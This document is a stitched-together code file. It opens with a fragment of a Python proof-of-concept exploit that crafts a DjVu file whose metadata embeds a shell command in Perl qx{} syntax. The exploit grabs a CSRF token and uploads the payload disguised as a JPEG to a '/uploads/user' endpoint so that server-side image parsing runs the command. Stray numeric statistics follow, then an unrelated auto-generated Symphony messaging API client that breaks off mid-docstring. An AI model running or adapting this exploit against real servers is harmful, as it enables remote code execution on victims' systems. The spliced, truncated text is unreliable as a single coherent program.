prepend = b'\x41\x54\x26\x54\x46\x4F\x52\x4D\x00\x00\x03\xAF\x44\x4A\x56\x4D\x44\x49\x52\x4D\x00\x00\x00\x2E\x81\x00\x02\x00\x00\x00\x46\x00\x00\x00\xAC\xFF\xFF\xDE\xBF\x99\x20\x21\xC8\x91\x4E\xEB\x0C\x07\x1F\xD2\xDA\x88\xE8\x6B\xE6\x44\x0F\x2C\x71\x02\xEE\x49\xD3\x6E\x95\xBD\xA2\xC3\x22\x3F\x46\x4F\x52\x4D\x00\x00\x00\x5E\x44\x4A\x56\x55\x49\x4E\x46\x4F\x00\x00\x00\x0A\x00\x08\x00\x08\x18\x00\x64\x00\x16\x00\x49\x4E\x43\x4C\x00\x00\x00\x0F\x73\x68\x61\x72\x65\x64\x5F\x61\x6E\x6E\x6F\x2E\x69\x66\x66\x00\x42\x47\x34\x34\x00\x00\x00\x11\x00\x4A\x01\x02\x00\x08\x00\x08\x8A\xE6\xE1\xB1\x37\xD9\x7F\x2A\x89\x00\x42\x47\x34\x34\x00\x00\x00\x04\x01\x0F\xF9\x9F\x42\x47\x34\x34\x00\x00\x00\x02\x02\x0A\x46\x4F\x52\x4D\x00\x00\x03\x07\x44\x4A\x56\x49\x41\x4E\x54\x61\x00\x00\x01\x50\x28\x6D\x65\x74\x61\x64\x61\x74\x61\x0A\x09\x28\x43\x6F\x70\x79\x72\x69\x67\x68\x74\x20\x22\x5C\x0A\x22\x20\x2E\x20\x71\x78\x7B'
append = b'\x7D\x20\x2E\x20\x5C\x0A\x22\x20\x62\x20\x22\x29\x20\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0A'
def csrf_token():
    """Fetch the sign-in page and return the CSRF token embedded in it."""
    page = session.get(f'{target}/users/sign_in', headers={'Origin': target})
    match = CSRF_PATTERN.search(page.content)
    assert match, 'No CSRF Token found'
    return match.group(1).decode()
def exploit():
    """Upload the crafted payload as a JPEG so the server-side image pass runs it."""
    payload = prepend + command.encode() + append
    upload = [('file', ('test.jpg', payload, 'image/jpeg'))]
    session.post(f'{target}/uploads/user', files=upload, headers={'X-CSRF-Token': csrf_token()})
def _main():
    """Run the PoC end to end and report completion."""
    exploit()
    print('finish test')


if __name__ == '__main__':
    _main()
| 110.833333
| 1,756
| 0.730226
| 753
| 3,325
| 3.207171
| 0.199203
| 1.043478
| 1.561491
| 2.077019
| 0.583851
| 0.576398
| 0.568944
| 0.542857
| 0.522981
| 0.522981
| 0
| 0.385141
| 0.032481
| 3,325
| 29
| 1,757
| 114.655172
| 0.365558
| 0
| 0
| 0
| 0
| 0.1
| 0.839399
| 0.806917
| 0
| 1
| 0
| 0
| 0.05
| 1
| 0.1
| false
| 0
| 0.15
| 0
| 0.3
| 0.05
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
db4dc40da743e3db93069f1b18c7cc77395376a5
| 54,821
|
py
|
Python
|
symphony/bdk/gen/agent_api/messages_api.py
|
symphony-elias/symphony-bdk-python
|
0d1cd94a9982e3687ea52c49acdb5f942ecd9bec
|
[
"Apache-2.0"
] | 17
|
2018-09-06T09:58:18.000Z
|
2021-07-13T12:54:20.000Z
|
symphony/bdk/gen/agent_api/messages_api.py
|
symphony-elias/symphony-bdk-python
|
0d1cd94a9982e3687ea52c49acdb5f942ecd9bec
|
[
"Apache-2.0"
] | 59
|
2018-11-21T15:17:57.000Z
|
2021-08-03T10:00:43.000Z
|
symphony/bdk/gen/agent_api/messages_api.py
|
symphony-elias/symphony-bdk-python
|
0d1cd94a9982e3687ea52c49acdb5f942ecd9bec
|
[
"Apache-2.0"
] | 37
|
2018-09-01T03:07:48.000Z
|
2021-07-06T10:21:50.000Z
|
"""
Agent API
This document refers to Symphony API calls to send and receive messages and content. They need the on-premise Agent installed to perform decryption/encryption of content. - sessionToken and keyManagerToken can be obtained by calling the authenticationAPI on the symphony back end and the key manager respectively. Refer to the methods described in authenticatorAPI.yaml. - Actions are defined to be atomic, ie will succeed in their entirety or fail and have changed nothing. - If it returns a 40X status then it will have sent no message to any stream even if a request to aome subset of the requested streams would have succeeded. - If this contract cannot be met for any reason then this is an error and the response code will be 50X. - MessageML is a markup language for messages. See reference here: https://rest-api.symphony.com/docs/messagemlv2 - **Real Time Events**: The following events are returned when reading from a real time messages and events stream (\"datafeed\"). These events will be returned for datafeeds created with the v5 endpoints. To know more about the endpoints, refer to Create Messages/Events Stream and Read Messages/Events Stream. Unless otherwise specified, all events were added in 1.46. # noqa: E501
The version of the OpenAPI document: 20.13.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from symphony.bdk.gen.api_client import ApiClient, Endpoint as _Endpoint
from symphony.bdk.gen.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from symphony.bdk.gen.agent_model.message_search_query import MessageSearchQuery
from symphony.bdk.gen.agent_model.v2_error import V2Error
from symphony.bdk.gen.agent_model.v4_import_response_list import V4ImportResponseList
from symphony.bdk.gen.agent_model.v4_message import V4Message
from symphony.bdk.gen.agent_model.v4_message_blast_response import V4MessageBlastResponse
from symphony.bdk.gen.agent_model.v4_message_import_list import V4MessageImportList
from symphony.bdk.gen.agent_model.v4_message_list import V4MessageList
class MessagesApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
        # NOTE: auto-generated by OpenAPI Generator — keep edits to comments only
        # so regeneration stays clean.
        def __v1_message_id_get(
            self,
            session_token,
            key_manager_token,
            id,
            **kwargs
        ):
            """Get a message by ID  # noqa: E501

            This method makes a synchronous HTTP request by default. To make an
            asynchronous HTTP request, please pass async_req=True

            >>> thread = agent_api.v1_message_id_get(session_token, key_manager_token, id, async_req=True)
            >>> result = thread.get()

            Args:
                session_token (str): Session authentication token.
                key_manager_token (str): Key Manager authentication token.
                id (str): Message ID as a URL-safe string

            Keyword Args:
                _return_http_data_only (bool): response data without head status
                    code and headers. Default is True.
                _preload_content (bool): if False, the urllib3.HTTPResponse object
                    will be returned without reading/decoding response data.
                    Default is True.
                _request_timeout (float/tuple): timeout setting for this request. If one
                    number provided, it will be total request timeout. It can also
                    be a pair (tuple) of (connection, read) timeouts.
                    Default is None.
                _check_input_type (bool): specifies if type checking
                    should be done one the data sent to the server.
                    Default is True.
                _check_return_type (bool): specifies if type checking
                    should be done one the data received from the server.
                    Default is True.
                _host_index (int/None): specifies the index of the server
                    that we want to use.
                    Default is read from the configuration.
                async_req (bool): execute request asynchronously

            Returns:
                V4Message
                    If the method is called asynchronously, returns the request
                    thread.
            """
            # Give every per-request option an explicit value so
            # call_with_http_info never sees a missing flag.
            kwargs['async_req'] = kwargs.get(
                'async_req', False
            )
            kwargs['_return_http_data_only'] = kwargs.get(
                '_return_http_data_only', True
            )
            kwargs['_preload_content'] = kwargs.get(
                '_preload_content', True
            )
            kwargs['_request_timeout'] = kwargs.get(
                '_request_timeout', None
            )
            kwargs['_check_input_type'] = kwargs.get(
                '_check_input_type', True
            )
            kwargs['_check_return_type'] = kwargs.get(
                '_check_return_type', True
            )
            kwargs['_host_index'] = kwargs.get('_host_index')
            # Required parameters are routed through kwargs so the Endpoint can
            # validate and place them (headers/path) uniformly.
            kwargs['session_token'] = \
                session_token
            kwargs['key_manager_token'] = \
                key_manager_token
            kwargs['id'] = \
                id
            return self.call_with_http_info(**kwargs)

        # Public endpoint object: binds the closure above to the OpenAPI metadata
        # (path, verb, parameter types and locations) for GET /v1/message/{id}.
        self.v1_message_id_get = _Endpoint(
            settings={
                'response_type': (V4Message,),
                'auth': [],
                'endpoint_path': '/v1/message/{id}',
                'operation_id': 'v1_message_id_get',
                'http_method': 'GET',
                'servers': None,
            },
            params_map={
                'all': [
                    'session_token',
                    'key_manager_token',
                    'id',
                ],
                'required': [
                    'session_token',
                    'key_manager_token',
                    'id',
                ],
                'nullable': [
                ],
                'enum': [
                ],
                'validation': [
                ]
            },
            root_map={
                'validations': {
                },
                'allowed_values': {
                },
                'openapi_types': {
                    'session_token':
                        (str,),
                    'key_manager_token':
                        (str,),
                    'id':
                        (str,),
                },
                'attribute_map': {
                    'session_token': 'sessionToken',
                    'key_manager_token': 'keyManagerToken',
                    'id': 'id',
                },
                'location_map': {
                    'session_token': 'header',
                    'key_manager_token': 'header',
                    'id': 'path',
                },
                'collection_format_map': {
                }
            },
            headers_map={
                'accept': [
                    'application/json'
                ],
                'content_type': [],
            },
            api_client=api_client,
            callable=__v1_message_id_get
        )
        # NOTE: auto-generated by OpenAPI Generator — keep edits to comments only
        # so regeneration stays clean.
        def __v1_message_search_get(
            self,
            query,
            session_token,
            key_manager_token,
            **kwargs
        ):
            """Search messages  # noqa: E501

            Search messages according to the specified criteria. The \"query\" parameter takes a search query defined as \"field:value\" pairs combined by the operator \"AND\" (e.g. \"text:foo AND autor:bar\"). Supported fields are (case-insensitive): \"text\", \"author\", \"hashtag\", \"cashtag\", \"mention\", \"signal\", \"fromDate\", \"toDate\", \"streamId\", \"streamType\". \"text\" search requires a \"streamId\" to be specified. \"streamType\" accepts one of the following values: \"chat\" (IMs and MIMs), \"im\", \"mim\", \"chatroom\", \"post\". \"signal\" queries can only be combined with \"fromDate\", \"toDate\", \"skip\" and \"limit\" parameters.  # noqa: E501

            This method makes a synchronous HTTP request by default. To make an
            asynchronous HTTP request, please pass async_req=True

            >>> thread = agent_api.v1_message_search_get(query, session_token, key_manager_token, async_req=True)
            >>> result = thread.get()

            Args:
                query (str): The search query. See above for the query syntax.
                session_token (str): Session authentication token.
                key_manager_token (str): Key Manager authentication token.

            Keyword Args:
                skip (int): No. of results to skip. . [optional]
                limit (int): Max no. of results to return. If no value is provided, 50 is the default. . [optional]
                scope (str): Describes where content should be searched for that query. It can exclusively apply to Symphony content or to one Connector. . [optional]
                sort_dir (str): Messages sort direction : ASC or DESC (default to DESC) . [optional]
                _return_http_data_only (bool): response data without head status
                    code and headers. Default is True.
                _preload_content (bool): if False, the urllib3.HTTPResponse object
                    will be returned without reading/decoding response data.
                    Default is True.
                _request_timeout (float/tuple): timeout setting for this request. If one
                    number provided, it will be total request timeout. It can also
                    be a pair (tuple) of (connection, read) timeouts.
                    Default is None.
                _check_input_type (bool): specifies if type checking
                    should be done one the data sent to the server.
                    Default is True.
                _check_return_type (bool): specifies if type checking
                    should be done one the data received from the server.
                    Default is True.
                _host_index (int/None): specifies the index of the server
                    that we want to use.
                    Default is read from the configuration.
                async_req (bool): execute request asynchronously

            Returns:
                V4MessageList
                    If the method is called asynchronously, returns the request
                    thread.
            """
            # Give every per-request option an explicit value so
            # call_with_http_info never sees a missing flag.
            kwargs['async_req'] = kwargs.get(
                'async_req', False
            )
            kwargs['_return_http_data_only'] = kwargs.get(
                '_return_http_data_only', True
            )
            kwargs['_preload_content'] = kwargs.get(
                '_preload_content', True
            )
            kwargs['_request_timeout'] = kwargs.get(
                '_request_timeout', None
            )
            kwargs['_check_input_type'] = kwargs.get(
                '_check_input_type', True
            )
            kwargs['_check_return_type'] = kwargs.get(
                '_check_return_type', True
            )
            kwargs['_host_index'] = kwargs.get('_host_index')
            # Required parameters are routed through kwargs so the Endpoint can
            # validate and place them (query string/headers) uniformly.
            kwargs['query'] = \
                query
            kwargs['session_token'] = \
                session_token
            kwargs['key_manager_token'] = \
                key_manager_token
            return self.call_with_http_info(**kwargs)

        # Public endpoint object: binds the closure above to the OpenAPI metadata
        # for GET /v1/message/search (query goes in the query string here).
        self.v1_message_search_get = _Endpoint(
            settings={
                'response_type': (V4MessageList,),
                'auth': [],
                'endpoint_path': '/v1/message/search',
                'operation_id': 'v1_message_search_get',
                'http_method': 'GET',
                'servers': None,
            },
            params_map={
                'all': [
                    'query',
                    'session_token',
                    'key_manager_token',
                    'skip',
                    'limit',
                    'scope',
                    'sort_dir',
                ],
                'required': [
                    'query',
                    'session_token',
                    'key_manager_token',
                ],
                'nullable': [
                ],
                'enum': [
                ],
                'validation': [
                ]
            },
            root_map={
                'validations': {
                },
                'allowed_values': {
                },
                'openapi_types': {
                    'query':
                        (str,),
                    'session_token':
                        (str,),
                    'key_manager_token':
                        (str,),
                    'skip':
                        (int,),
                    'limit':
                        (int,),
                    'scope':
                        (str,),
                    'sort_dir':
                        (str,),
                },
                'attribute_map': {
                    'query': 'query',
                    'session_token': 'sessionToken',
                    'key_manager_token': 'keyManagerToken',
                    'skip': 'skip',
                    'limit': 'limit',
                    'scope': 'scope',
                    'sort_dir': 'sortDir',
                },
                'location_map': {
                    'query': 'query',
                    'session_token': 'header',
                    'key_manager_token': 'header',
                    'skip': 'query',
                    'limit': 'query',
                    'scope': 'query',
                    'sort_dir': 'query',
                },
                'collection_format_map': {
                }
            },
            headers_map={
                'accept': [
                    'application/json'
                ],
                'content_type': [],
            },
            api_client=api_client,
            callable=__v1_message_search_get
        )
        # NOTE: auto-generated by OpenAPI Generator — keep edits to comments only
        # so regeneration stays clean.
        def __v1_message_search_post(
            self,
            session_token,
            key_manager_token,
            query,
            **kwargs
        ):
            """Search messages  # noqa: E501

            Search messages according to the specified criteria.  # noqa: E501

            This method makes a synchronous HTTP request by default. To make an
            asynchronous HTTP request, please pass async_req=True

            >>> thread = agent_api.v1_message_search_post(session_token, key_manager_token, query, async_req=True)
            >>> result = thread.get()

            Args:
                session_token (str): Session authentication token.
                key_manager_token (str): Key Manager authentication token.
                query (MessageSearchQuery): The search query. See above for the query syntax.

            Keyword Args:
                skip (int): No. of results to skip. . [optional]
                limit (int): Max no. of results to return. If no value is provided, 50 is the default. . [optional]
                scope (str): Describes where content should be searched for that query. It can exclusively apply to Symphony content or to one Connector. . [optional]
                sort_dir (str): Messages sort direction : ASC or DESC (default to DESC) . [optional]
                _return_http_data_only (bool): response data without head status
                    code and headers. Default is True.
                _preload_content (bool): if False, the urllib3.HTTPResponse object
                    will be returned without reading/decoding response data.
                    Default is True.
                _request_timeout (float/tuple): timeout setting for this request. If one
                    number provided, it will be total request timeout. It can also
                    be a pair (tuple) of (connection, read) timeouts.
                    Default is None.
                _check_input_type (bool): specifies if type checking
                    should be done one the data sent to the server.
                    Default is True.
                _check_return_type (bool): specifies if type checking
                    should be done one the data received from the server.
                    Default is True.
                _host_index (int/None): specifies the index of the server
                    that we want to use.
                    Default is read from the configuration.
                async_req (bool): execute request asynchronously

            Returns:
                V4MessageList
                    If the method is called asynchronously, returns the request
                    thread.
            """
            # Give every per-request option an explicit value so
            # call_with_http_info never sees a missing flag.
            kwargs['async_req'] = kwargs.get(
                'async_req', False
            )
            kwargs['_return_http_data_only'] = kwargs.get(
                '_return_http_data_only', True
            )
            kwargs['_preload_content'] = kwargs.get(
                '_preload_content', True
            )
            kwargs['_request_timeout'] = kwargs.get(
                '_request_timeout', None
            )
            kwargs['_check_input_type'] = kwargs.get(
                '_check_input_type', True
            )
            kwargs['_check_return_type'] = kwargs.get(
                '_check_return_type', True
            )
            kwargs['_host_index'] = kwargs.get('_host_index')
            # Required parameters are routed through kwargs so the Endpoint can
            # validate and place them (headers/body) uniformly.
            kwargs['session_token'] = \
                session_token
            kwargs['key_manager_token'] = \
                key_manager_token
            kwargs['query'] = \
                query
            return self.call_with_http_info(**kwargs)

        # Public endpoint object: binds the closure above to the OpenAPI metadata
        # for POST /v1/message/search (query travels as a JSON body here, unlike
        # the GET variant above).
        self.v1_message_search_post = _Endpoint(
            settings={
                'response_type': (V4MessageList,),
                'auth': [],
                'endpoint_path': '/v1/message/search',
                'operation_id': 'v1_message_search_post',
                'http_method': 'POST',
                'servers': None,
            },
            params_map={
                'all': [
                    'session_token',
                    'key_manager_token',
                    'query',
                    'skip',
                    'limit',
                    'scope',
                    'sort_dir',
                ],
                'required': [
                    'session_token',
                    'key_manager_token',
                    'query',
                ],
                'nullable': [
                ],
                'enum': [
                ],
                'validation': [
                ]
            },
            root_map={
                'validations': {
                },
                'allowed_values': {
                },
                'openapi_types': {
                    'session_token':
                        (str,),
                    'key_manager_token':
                        (str,),
                    'query':
                        (MessageSearchQuery,),
                    'skip':
                        (int,),
                    'limit':
                        (int,),
                    'scope':
                        (str,),
                    'sort_dir':
                        (str,),
                },
                'attribute_map': {
                    'session_token': 'sessionToken',
                    'key_manager_token': 'keyManagerToken',
                    'skip': 'skip',
                    'limit': 'limit',
                    'scope': 'scope',
                    'sort_dir': 'sortDir',
                },
                'location_map': {
                    'session_token': 'header',
                    'key_manager_token': 'header',
                    'query': 'body',
                    'skip': 'query',
                    'limit': 'query',
                    'scope': 'query',
                    'sort_dir': 'query',
                },
                'collection_format_map': {
                }
            },
            headers_map={
                'accept': [
                    'application/json'
                ],
                'content_type': [
                    'application/json'
                ]
            },
            api_client=api_client,
            callable=__v1_message_search_post
        )
def __v4_message_blast_post(
    self,
    session_token,
    sids,
    **kwargs
):
    """Post a message to multiple existing streams.  # noqa: E501

    Posts a new message to every stream in ``sids`` (chatroom, IM or
    multiparty IM); may include an attachment. The call is synchronous by
    default; pass ``async_req=True`` to get the request thread instead.

    >>> thread = agent_api.v4_message_blast_post(session_token, sids, async_req=True)
    >>> result = thread.get()

    Args:
        session_token (str): Authorization token used to make delegated calls.
        sids ([str]): A comma-separated list of Stream IDs

    Keyword Args:
        key_manager_token (str): Key Manager authentication token. [optional]
        message (str): The message payload in MessageML. [optional]
        data (str): Optional message data in EntityJSON. [optional]
        version (str): Optional message version ("major.minor"). [optional]
        attachment (file_type): Optional file attachment. [optional]
        preview (file_type): Optional attachment preview. [optional]
        async_req (bool): execute request asynchronously. Default False.
        _return_http_data_only (bool): return response data without status
            code and headers. Default True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse without reading/decoding. Default True.
        _request_timeout (float/tuple): total timeout, or a
            (connection, read) pair. Default None.
        _check_input_type (bool): type-check data sent to the server.
            Default True.
        _check_return_type (bool): type-check data received from the
            server. Default True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.

    Returns:
        V4MessageBlastResponse, or the request thread when async_req=True.
    """
    # Fill in the standard request-control options, preserving any value
    # the caller supplied explicitly.
    for _option, _default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[_option] = kwargs.get(_option, _default)
    # Required positional parameters travel in kwargs as well.
    kwargs['session_token'] = session_token
    kwargs['sids'] = sids
    return self.call_with_http_info(**kwargs)
# Declarative descriptor for POST /v4/message/blast (multipart form upload).
# Wires parameter metadata to the private __v4_message_blast_post callable
# defined earlier in __init__.
self.v4_message_blast_post = _Endpoint(
    settings={
        'response_type': (V4MessageBlastResponse,),
        'auth': [],
        'endpoint_path': '/v4/message/blast',
        'operation_id': 'v4_message_blast_post',
        'http_method': 'POST',
        'servers': None,
    },
    params_map={
        'all': [
            'session_token',
            'sids',
            'key_manager_token',
            'message',
            'data',
            'version',
            'attachment',
            'preview',
        ],
        'required': [
            'session_token',
            'sids',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'session_token':
                (str,),
            'sids':
                ([str],),
            'key_manager_token':
                (str,),
            'message':
                (str,),
            'data':
                (str,),
            'version':
                (str,),
            'attachment':
                (file_type,),
            'preview':
                (file_type,),
        },
        'attribute_map': {
            'session_token': 'sessionToken',
            'sids': 'sids',
            'key_manager_token': 'keyManagerToken',
            'message': 'message',
            'data': 'data',
            'version': 'version',
            'attachment': 'attachment',
            'preview': 'preview',
        },
        # Tokens go in headers; message content and files go in form fields.
        'location_map': {
            'session_token': 'header',
            'sids': 'form',
            'key_manager_token': 'header',
            'message': 'form',
            'data': 'form',
            'version': 'form',
            'attachment': 'form',
            'preview': 'form',
        },
        # The sids list is serialized as a single comma-separated value.
        'collection_format_map': {
            'sids': 'csv',
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'multipart/form-data'
        ]
    },
    api_client=api_client,
    callable=__v4_message_blast_post
)
def __v4_message_import_post(
    self,
    session_token,
    key_manager_token,
    message_list,
    **kwargs
):
    """Import messages from other systems into Symphony.  # noqa: E501

    Sends messages to be imported with caller-supplied (past) timestamps
    and authors; requires the Content Management role. Synchronous by
    default; pass ``async_req=True`` to get the request thread instead.

    >>> thread = agent_api.v4_message_import_post(session_token, key_manager_token, message_list, async_req=True)
    >>> result = thread.get()

    Args:
        session_token (str): Session authentication token.
        key_manager_token (str): Key Manager authentication token.
        message_list (V4MessageImportList):

    Keyword Args:
        async_req (bool): execute request asynchronously. Default False.
        _return_http_data_only (bool): return response data without status
            code and headers. Default True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse without reading/decoding. Default True.
        _request_timeout (float/tuple): total timeout, or a
            (connection, read) pair. Default None.
        _check_input_type (bool): type-check data sent to the server.
            Default True.
        _check_return_type (bool): type-check data received from the
            server. Default True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.

    Returns:
        V4ImportResponseList, or the request thread when async_req=True.
    """
    # Fill in the standard request-control options, preserving any value
    # the caller supplied explicitly.
    for _option, _default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[_option] = kwargs.get(_option, _default)
    # Required positional parameters travel in kwargs as well.
    kwargs['session_token'] = session_token
    kwargs['key_manager_token'] = key_manager_token
    kwargs['message_list'] = message_list
    return self.call_with_http_info(**kwargs)
# Declarative descriptor for POST /v4/message/import. Wires parameter
# metadata to the private __v4_message_import_post callable defined
# earlier in __init__.
self.v4_message_import_post = _Endpoint(
    settings={
        'response_type': (V4ImportResponseList,),
        'auth': [],
        'endpoint_path': '/v4/message/import',
        'operation_id': 'v4_message_import_post',
        'http_method': 'POST',
        'servers': None,
    },
    params_map={
        # All three parameters are mandatory for this endpoint.
        'all': [
            'session_token',
            'key_manager_token',
            'message_list',
        ],
        'required': [
            'session_token',
            'key_manager_token',
            'message_list',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'session_token':
                (str,),
            'key_manager_token':
                (str,),
            'message_list':
                (V4MessageImportList,),
        },
        # 'message_list' is absent: body parameters are serialized whole
        # and have no wire attribute name.
        'attribute_map': {
            'session_token': 'sessionToken',
            'key_manager_token': 'keyManagerToken',
        },
        'location_map': {
            'session_token': 'header',
            'key_manager_token': 'header',
            'message_list': 'body',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json'
        ]
    },
    api_client=api_client,
    callable=__v4_message_import_post
)
def __v4_stream_sid_message_create_post(
    self,
    sid,
    session_token,
    **kwargs
):
    """Post a message to one existing stream.  # noqa: E501

    Posts a new message to the given stream (chatroom, IM or multiparty
    IM); may include an attachment. Synchronous by default; pass
    ``async_req=True`` to get the request thread instead.

    >>> thread = agent_api.v4_stream_sid_message_create_post(sid, session_token, async_req=True)
    >>> result = thread.get()

    Args:
        sid (str): Stream ID
        session_token (str): Authorization token used to make delegated calls.

    Keyword Args:
        key_manager_token (str): Key Manager authentication token. [optional]
        message (str): The message payload in MessageML. [optional]
        data (str): Optional message data in EntityJSON. [optional]
        version (str): Optional message version ("major.minor"). [optional]
        attachment (file_type): Optional file attachment. [optional]
        preview (file_type): Optional attachment preview. [optional]
        async_req (bool): execute request asynchronously. Default False.
        _return_http_data_only (bool): return response data without status
            code and headers. Default True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse without reading/decoding. Default True.
        _request_timeout (float/tuple): total timeout, or a
            (connection, read) pair. Default None.
        _check_input_type (bool): type-check data sent to the server.
            Default True.
        _check_return_type (bool): type-check data received from the
            server. Default True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.

    Returns:
        V4Message, or the request thread when async_req=True.
    """
    # Fill in the standard request-control options, preserving any value
    # the caller supplied explicitly.
    for _option, _default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[_option] = kwargs.get(_option, _default)
    # Required positional parameters travel in kwargs as well.
    kwargs['sid'] = sid
    kwargs['session_token'] = session_token
    return self.call_with_http_info(**kwargs)
# Declarative descriptor for POST /v4/stream/{sid}/message/create
# (multipart form upload). Wires parameter metadata to the private
# __v4_stream_sid_message_create_post callable defined earlier in __init__.
self.v4_stream_sid_message_create_post = _Endpoint(
    settings={
        'response_type': (V4Message,),
        'auth': [],
        'endpoint_path': '/v4/stream/{sid}/message/create',
        'operation_id': 'v4_stream_sid_message_create_post',
        'http_method': 'POST',
        'servers': None,
    },
    params_map={
        'all': [
            'sid',
            'session_token',
            'key_manager_token',
            'message',
            'data',
            'version',
            'attachment',
            'preview',
        ],
        'required': [
            'sid',
            'session_token',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'sid':
                (str,),
            'session_token':
                (str,),
            'key_manager_token':
                (str,),
            'message':
                (str,),
            'data':
                (str,),
            'version':
                (str,),
            'attachment':
                (file_type,),
            'preview':
                (file_type,),
        },
        'attribute_map': {
            'sid': 'sid',
            'session_token': 'sessionToken',
            'key_manager_token': 'keyManagerToken',
            'message': 'message',
            'data': 'data',
            'version': 'version',
            'attachment': 'attachment',
            'preview': 'preview',
        },
        # 'sid' is interpolated into the URL path; tokens go in headers;
        # message content and files go in form fields.
        'location_map': {
            'sid': 'path',
            'session_token': 'header',
            'key_manager_token': 'header',
            'message': 'form',
            'data': 'form',
            'version': 'form',
            'attachment': 'form',
            'preview': 'form',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'multipart/form-data'
        ]
    },
    api_client=api_client,
    callable=__v4_stream_sid_message_create_post
)
def __v4_stream_sid_message_get(
    self,
    sid,
    since,
    session_token,
    key_manager_token,
    **kwargs
):
    """Get messages from an existing stream.  # noqa: E501

    Fetches messages from the stream starting at the ``since`` timestamp;
    combine ``since`` and ``skip`` to page without missing or repeating
    messages. Synchronous by default; pass ``async_req=True`` to get the
    request thread instead.

    >>> thread = agent_api.v4_stream_sid_message_get(sid, since, session_token, key_manager_token, async_req=True)
    >>> result = thread.get()

    Args:
        sid (str): Stream ID
        since (int): Timestamp of first required message, in milliseconds
            since Jan 1 1970.
        session_token (str): Session authentication token.
        key_manager_token (str): Key Manager authentication token.

    Keyword Args:
        skip (int): No. of messages to skip. [optional]
        limit (int): Max no. of messages to return; default 50, maximum
            supported value 500. [optional]
        async_req (bool): execute request asynchronously. Default False.
        _return_http_data_only (bool): return response data without status
            code and headers. Default True.
        _preload_content (bool): if False, return the raw
